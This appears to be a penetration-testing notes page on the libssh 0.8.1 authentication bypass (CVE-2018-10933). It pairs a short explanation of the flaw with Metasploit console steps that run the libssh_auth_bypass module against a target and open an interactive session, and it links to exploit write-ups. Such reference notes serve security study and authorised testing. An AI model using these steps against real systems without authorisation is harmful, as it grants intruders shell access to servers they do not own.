libssh 0.8.1 - CVE 2018-10933

Theory

Description

In late 2018, a critical vulnerability was uncovered in the libssh server code. A vulnerability within the server code can enable a client to bypass the authentication process and set the internal state machine maintained by the library to authenticate, enabling the (otherwise prohibited) creation of channels.

Practical

Metasploit

msfconsole -q

use auxiliary/scanner/ssh/libssh_auth_bypass

set RHOSTS <IP>

set RPORT <ssh port>

set SPAWN_PTY true

run

# Interact with the session

sessions

sessions -i <session number>

FOR FURTHER READING

https://blog.pentesteracademy.com/libssh-authentication-bypass-abd8fff5b3db
https://www.exploit-db.com/exploits/45638
https://ine.com/blog/libssh-auth-bypass-cve-2018-10933
https://gist.github.com/mgeeky/a7271536b1d815acfb8060fd8b65bd5d

PreviousCVE's Nextproftpd-1.3.3c-backdoor

Last updated 8 months ago